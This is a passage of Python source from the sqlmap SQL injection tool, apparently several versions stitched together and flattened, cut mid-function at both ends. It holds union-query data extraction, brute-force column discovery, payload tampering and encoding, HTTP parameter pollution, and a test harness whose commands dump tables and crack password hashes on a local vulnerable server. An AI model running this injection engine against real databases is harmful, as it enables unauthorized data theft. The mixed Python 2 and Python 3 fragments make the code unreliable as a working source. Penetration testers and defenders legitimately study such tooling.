"CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1) elif Backend.isDbms(DBMS.ORACLE): query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1) elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1) elif Backend.isDbms(DBMS.MSSQL): query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop) output = _oneShotUnionUse(query, False) value = parseUnionPage(output) kb.jsonAggMode = False # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) debugMsg = "used SQL query returns " debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry") logger.debug(debugMsg) elif count and (not isinstance(count, six.string_types) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value if isNumPosStrValue(count) and int(count) > 1: threadData = getCurrentThreadData() try: threadData.shared.limits = iter(xrange(startLimit, stopLimit)) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: threadData.shared.counter += 1 num = next(threadData.shared.limits) except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: with kb.locks.value: if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): items = parseUnionPage(output) if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] items = [_ for _ in flattenValue(items)] if len(items) > len(expressionFieldsList): filtered = OrderedDict() for item in items: key = re.sub(r"[^A-Za-z0-9]", "", item).lower() if key not in filtered or re.search(r"[^A-Za-z0-9]", item): filtered[key] = item items = list(six.itervalues(filtered)) items = [items] index = None for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) else: index = None if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode: _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items])) status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\n" % status) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration) logger.debug(debugMsg) return value
def columnExists(columnFile, regex=None): if not conf.tbl: errMsg = "missing table parameter" raise sqlmapMissingMandatoryOptionException, errMsg result = inject.checkBooleanExpression( safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise sqlmapDataException, errMsg infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(__addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db: table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.outputs = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming( columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression( safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.outputs.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % ( time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % ( threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit), '%') dataToStdout( "\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.outputs: result = inject.checkBooleanExpression("%s" % safeStringFormat( "EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = 'numeric' else: columns[column] = 'non-numeric' kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
def smokeTest(): """ Runs the basic smoke testing of a program """ dirtyPatchRandom() retVal = True count, length = 0, 0 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": length += 1 for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): if any(_ in root for _ in ("thirdparty", "extra")): continue for filename in files: if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": path = os.path.join(root, os.path.splitext(filename)[0]) path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(os.sep, '.').lstrip('.') try: __import__(path) module = sys.modules[path] except Exception as ex: retVal = False dataToStdout("\r") errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) logger.error(errMsg) else: logger.setLevel(logging.CRITICAL) kb.smokeMode = True (failure_count, _) = doctest.testmod(module) kb.smokeMode = False logger.setLevel(logging.INFO) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) def _(node): for __ in dir(node): if not __.startswith('_'): candidate = getattr(node, __) if isinstance(candidate, str): if '\\' in candidate: try: re.compile(candidate) except: errMsg = "smoke test failed at compiling '%s'" % candidate logger.error(errMsg) raise else: _(candidate) for dbms in queries: try: _(queries[dbms]) except: retVal = False clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal
def queryPage( value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, ): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max( headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys() ) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace(">", ">").replace("<", "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if ( place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode ): payload = urlencode(payload, "%", False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(" "), " "): if splitter in payload: prefix, suffix = ( ("*/", "/*") if splitter == " " else (urlencode(_) for _ in ("*/", "/*")) ) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1], ) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix, ) payload = "".join(parts) for splitter in (urlencode(","), ","): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")) ) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = ( conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value ) post = post.replace(ASTERISK_MARKER, "*") if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: auxHeaders[value.split(",")[0]] = value.split(",", 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString, ) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter)) if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, "\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout(".") dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage( url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host ) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ), ) if headers: if ( kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers ): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find("/") + 1 :] ) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare, ) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True, ) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return ( comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength), ) else: return comparison(page, headers, code, getRatioValue, pageLength)
def vulnTest(): """ Runs the testing against 'vulnserver' """ TESTS = ( (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'",)), (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape", (u": '\u0161u\u0107uraj'",)), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-r <request> --flush-session -v 5", ("CloudFlare", "possible DBMS: 'SQLite'", "User-agent: foobar")), ("-l <log> --flush-session --skip-waf -v 3 --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell")), ("-l <log> --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), ("-u <url> --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), ("-u <url> --flush-session --data='{\"id\": 1}' --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), ("-u <url> --flush-session -H 'Foo: Bar' -H 'Sna: Fu' --data='<root><param name=\"id\" value=\"1*\"/></root>' --union-char=1 --mobile --answers='smartphone=3' --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")), ("-u <url> --flush-session --method=PUT --data='a=1&b=2&c=3&id=1' --skip-static --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "2 entries")), ("-u <url> --flush-session -H 'id: 1*' --tables", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --banner --invalid-logical --technique=B --test-filter='OR boolean' --tamper=space2dash", ("banner: '3.", " LIKE ")), ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner", ("NULL connection is supported with HEAD method", "banner: '3.")), ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --answer=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary")), ("-u <url> --flush-session --all", ("5 entries", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), ("-u '<url>&echo=foobar*' --flush-session", ("might be vulnerable to cross-site scripting",)), ("-u '<url>&query=*' --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d <direct> --flush-session --dump -T users --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)",)), ("-d <direct> --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "[*] 987654321",)), ) retVal = True count = 0 address, port = "127.0.0.10", random.randint(1025, 65535) def _thread(): vulnserver.init(quiet=True) vulnserver.run(address=address, port=port) thread = threading.Thread(target=_thread) thread.daemon = True thread.start() while True: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((address, port)) break except: time.sleep(1) handle, database = tempfile.mkstemp(suffix=".sqlite") os.close(handle) with sqlite3.connect(database) as conn: c = conn.cursor() c.executescript(vulnserver.SCHEMA) handle, request = tempfile.mkstemp(suffix=".req") os.close(handle) handle, log = tempfile.mkstemp(suffix=".log") os.close(handle) content = "POST / HTTP/1.0\nUser-agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) open(request, "w+").write(content) open(log, "w+").write('<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False))) url = "http://%s:%d/?id=1" % (address, port) direct = "sqlite3://%s" % database for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) cmd = "%s %s %s --batch" % (sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options.replace("<url>", url).replace("<direct>", direct).replace("<request>", request).replace("<log>", log)) output = shellExec(cmd) if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks): dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target URL then call its subsidiary function to effectively perform an union SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries 